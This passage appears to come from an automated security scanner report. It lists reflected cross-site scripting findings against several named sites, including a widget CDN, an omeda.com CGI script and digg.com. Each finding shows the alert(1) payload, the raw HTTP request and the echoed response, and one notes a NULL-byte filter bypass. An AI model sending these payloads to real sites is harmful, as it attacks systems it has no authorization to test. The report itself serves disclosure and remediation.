Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 525ac<img%20src%3da%20onerror%3dalert(1)>31e1f24bbff was submitted in the REST URL parameter 9. This input was echoed as 525ac<img src=a onerror=alert(1)>31e1f24bbff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05525ac<img%20src%3da%20onerror%3dalert(1)>31e1f24bbff/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:01:03 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17782


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
alizationParams : {"id":"8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05525ac<img src=a onerror=alert(1)>31e1f24bbff/ibm_backupe.png","wbx_ns_link":"http://ad.doubleclick.net/clk"},

processPathParameters : function(){

var fifMode = WIDGETBOX.platform.WidgetConfigPathHandler.initializationParams["fif"];
...[SNIP]...

2.81. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 10]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 10 is copied into the HTML document as plain text between tags. The payload 7f7f5<img%20src%3da%20onerror%3dalert(1)>3c654610702 was submitted in the REST URL parameter 10. This input was echoed as 7f7f5<img src=a onerror=alert(1)>3c654610702 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:7f7f5<img%20src%3da%20onerror%3dalert(1)>3c654610702/ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:01:04 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17780


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
9-4fa0-afc7-39d1d89ea475","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png","wbx_ns_link":"http:7f7f5<img src=a onerror=alert(1)>3c654610702/ad.doubleclick.net/clk"},

processPathParameters : function(){

var fifMode = WIDGETBOX.platform.WidgetConfigPathHandler.initializationParams["fif"];
if(fifMode && WIDGETBOX.platfo
...[SNIP]...

2.82. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 11]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 11 is copied into the HTML document as plain text between tags. The payload a0036<img%20src%3da%20onerror%3dalert(1)>08dc7b33eb9 was submitted in the REST URL parameter 11. This input was echoed as a0036<img src=a onerror=alert(1)>08dc7b33eb9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.neta0036<img%20src%3da%20onerror%3dalert(1)>08dc7b33eb9/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:01:08 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17788


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
ea475","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png","wbx_ns_link":"http:/ad.doubleclick.neta0036<img src=a onerror=alert(1)>08dc7b33eb9/clk"},

processPathParameters : function(){

var fifMode = WIDGETBOX.platform.WidgetConfigPathHandler.initializationParams["fif"];
if(fifMode && WIDGETBOX.platform.FriendlyIFrame){
...[SNIP]...

2.83. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 12]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 12 is copied into the HTML document as plain text between tags. The payload 44b22<img%20src%3da%20onerror%3dalert(1)>852bd0645a2 was submitted in the REST URL parameter 12. This input was echoed as 44b22<img src=a onerror=alert(1)>852bd0645a2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk44b22<img%20src%3da%20onerror%3dalert(1)>852bd0645a2 HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:01:11 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17788


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
5","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png","wbx_ns_link":"http:/ad.doubleclick.net/clk44b22<img src=a onerror=alert(1)>852bd0645a2"},

processPathParameters : function(){

var fifMode = WIDGETBOX.platform.WidgetConfigPathHandler.initializationParams["fif"];
if(fifMode && WIDGETBOX.platform.FriendlyIFrame){

...[SNIP]...

2.84. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c5a01<img%20src%3da%20onerror%3dalert(1)>226f8532ecf was submitted in the REST URL parameter 4. This input was echoed as c5a01<img src=a onerror=alert(1)>226f8532ecf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/idc5a01<img%20src%3da%20onerror%3dalert(1)>226f8532ecf/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:00:47 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17788


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
adyCallback, true);
}
};

WIDGETBOX.platform.WidgetConfig = WidgetConfig;
})();

WIDGETBOX.platform.WidgetConfigPathHandler = {
initializationParams : {"platform":"InsertWidget","idc5a01<img src=a onerror=alert(1)>226f8532ecf":"8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475"},

configurationParams : {"wbx_ns_image":"http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png","wbx_ns_link":"http:/ad.doublec
...[SNIP]...

2.85. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload cee27<img%20src%3da%20onerror%3dalert(1)>ee6ba422ee7 was submitted in the REST URL parameter 5. This input was echoed as cee27<img src=a onerror=alert(1)>ee6ba422ee7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475cee27<img%20src%3da%20onerror%3dalert(1)>ee6ba422ee7/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:00:50 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17788


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
true);
}
};

WIDGETBOX.platform.WidgetConfig = WidgetConfig;
})();

WIDGETBOX.platform.WidgetConfigPathHandler = {
initializationParams : {"id":"8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475cee27<img src=a onerror=alert(1)>ee6ba422ee7","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png","wbx_ns_link":"http:/ad.doubleclick.net/clk"
...[SNIP]...

2.86. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 3a824<img%20src%3da%20onerror%3dalert(1)>faddef53f15 was submitted in the REST URL parameter 6. This input was echoed as 3a824<img src=a onerror=alert(1)>faddef53f15 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:3a824<img%20src%3da%20onerror%3dalert(1)>faddef53f15/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:00:53 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17780


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
();

WIDGETBOX.platform.WidgetConfigPathHandler = {
initializationParams : {"id":"8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http:3a824<img src=a onerror=alert(1)>faddef53f15/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png","wbx_ns_link":"http:/ad.doubleclick.net/clk"},

processPathParameters : function(){

var fifMode = WIDGETBOX.pl
...[SNIP]...

2.87. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 4c632<img%20src%3da%20onerror%3dalert(1)>ab7a6b90e92 was submitted in the REST URL parameter 7. This input was echoed as 4c632<img src=a onerror=alert(1)>ab7a6b90e92 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com4c632<img%20src%3da%20onerror%3dalert(1)>ab7a6b90e92/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:00:56 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17780


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
tform.WidgetConfigPathHandler = {
initializationParams : {"id":"8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http:/img.widgetbox.com4c632<img src=a onerror=alert(1)>ab7a6b90e92/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png","wbx_ns_link":"http:/ad.doubleclick.net/clk"},

processPathParameters : function(){

var fifMode = WIDGETBOX.platform.WidgetConfi
...[SNIP]...

2.88. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload 4b7a4<img%20src%3da%20onerror%3dalert(1)>a00070d10d9 was submitted in the REST URL parameter 8. This input was echoed as 4b7a4<img src=a onerror=alert(1)>a00070d10d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded4b7a4<img%20src%3da%20onerror%3dalert(1)>a00070d10d9/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:00:59 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17780


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
getConfigPathHandler = {
initializationParams : {"id":"8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http:/img.widgetbox.com/uploaded4b7a4<img src=a onerror=alert(1)>a00070d10d9/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png","wbx_ns_link":"http:/ad.doubleclick.net/clk"},

processPathParameters : function(){

var fifMode = WIDGETBOX.platform.WidgetConfigPathHand
...[SNIP]...

2.89. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 5d93e<img%20src%3da%20onerror%3dalert(1)>6d74913966e was submitted in the REST URL parameter 9. This input was echoed as 5d93e<img src=a onerror=alert(1)>6d74913966e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db055d93e<img%20src%3da%20onerror%3dalert(1)>6d74913966e/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:01:01 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17788


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
ializationParams : {"id":"8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db055d93e<img src=a onerror=alert(1)>6d74913966e/ibm_backupe.png","wbx_ns_link":"http:/ad.doubleclick.net/clk"},

processPathParameters : function(){

var fifMode = WIDGETBOX.platform.WidgetConfigPathHandler.initializationParams["fif"];

...[SNIP]...

2.90. https://cxo.omeda.com/cgi-win/cio.cgi [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://cxo.omeda.com
Path:   /cgi-win/cio.cgi

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload abba8<script>alert(1)</script>cc716b12454 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-winabba8<script>alert(1)</script>cc716b12454/cio.cgi HTTP/1.1
Host: cxo.omeda.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Thu, 16 Dec 2010 15:01:47 GMT
Server: WebSitePro/2.5.8
Accept-ranges: bytes
Content-type: text/html
Content-length: 311

<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD>
<BODY bgcolor="White"><H2>404 Not Found</H2>
The requested URL was not found on this server:<P><CODE>/cgi-winabba8<script>alert(1)</script>cc716b12454/cio.cgi<P>
...[SNIP]...

2.91. https://cxo.omeda.com/cgi-win/cio.cgi [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://cxo.omeda.com
Path:   /cgi-win/cio.cgi

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cf65d<script>alert(1)</script>77b2e91fe7a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-win/cio.cgicf65d<script>alert(1)</script>77b2e91fe7a HTTP/1.1
Host: cxo.omeda.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Thu, 16 Dec 2010 15:01:49 GMT
Server: WebSitePro/2.5.8
Accept-ranges: bytes
Content-type: text/html
Content-length: 304

<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD>
<BODY bgcolor="White"><H2>404 Not Found</H2>
The requested URL was not found on this server:<P><CODE>/cgi-win/cio.cgicf65d<script>alert(1)</script>77b2e91fe7a<P>
...[SNIP]...

2.92. https://cxo.omeda.com/cgi-win/cio.cgi [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://cxo.omeda.com
Path:   /cgi-win/cio.cgi

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 350aa"><script>alert(1)</script>3be711c838a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-win/cio.cgi?350aa"><script>alert(1)</script>3be711c838a=1 HTTP/1.1
Host: cxo.omeda.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 16 Dec 2010 15:01:31 GMT
Server: WebSitePro/2.5.8
Accept-ranges: bytes
Content-type: text/html
Content-length: 39866

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title
...[SNIP]...
<input type="hidden" name="CALLINGURL" value="350aa"><script>alert(1)</script>3be711c838a=1">
...[SNIP]...

2.93. http://digg.com/submit [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0029eb0"><script>alert(1)</script>55798b8d873 was submitted in the REST URL parameter 1. This input was echoed as 29eb0"><script>alert(1)</script>55798b8d873 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

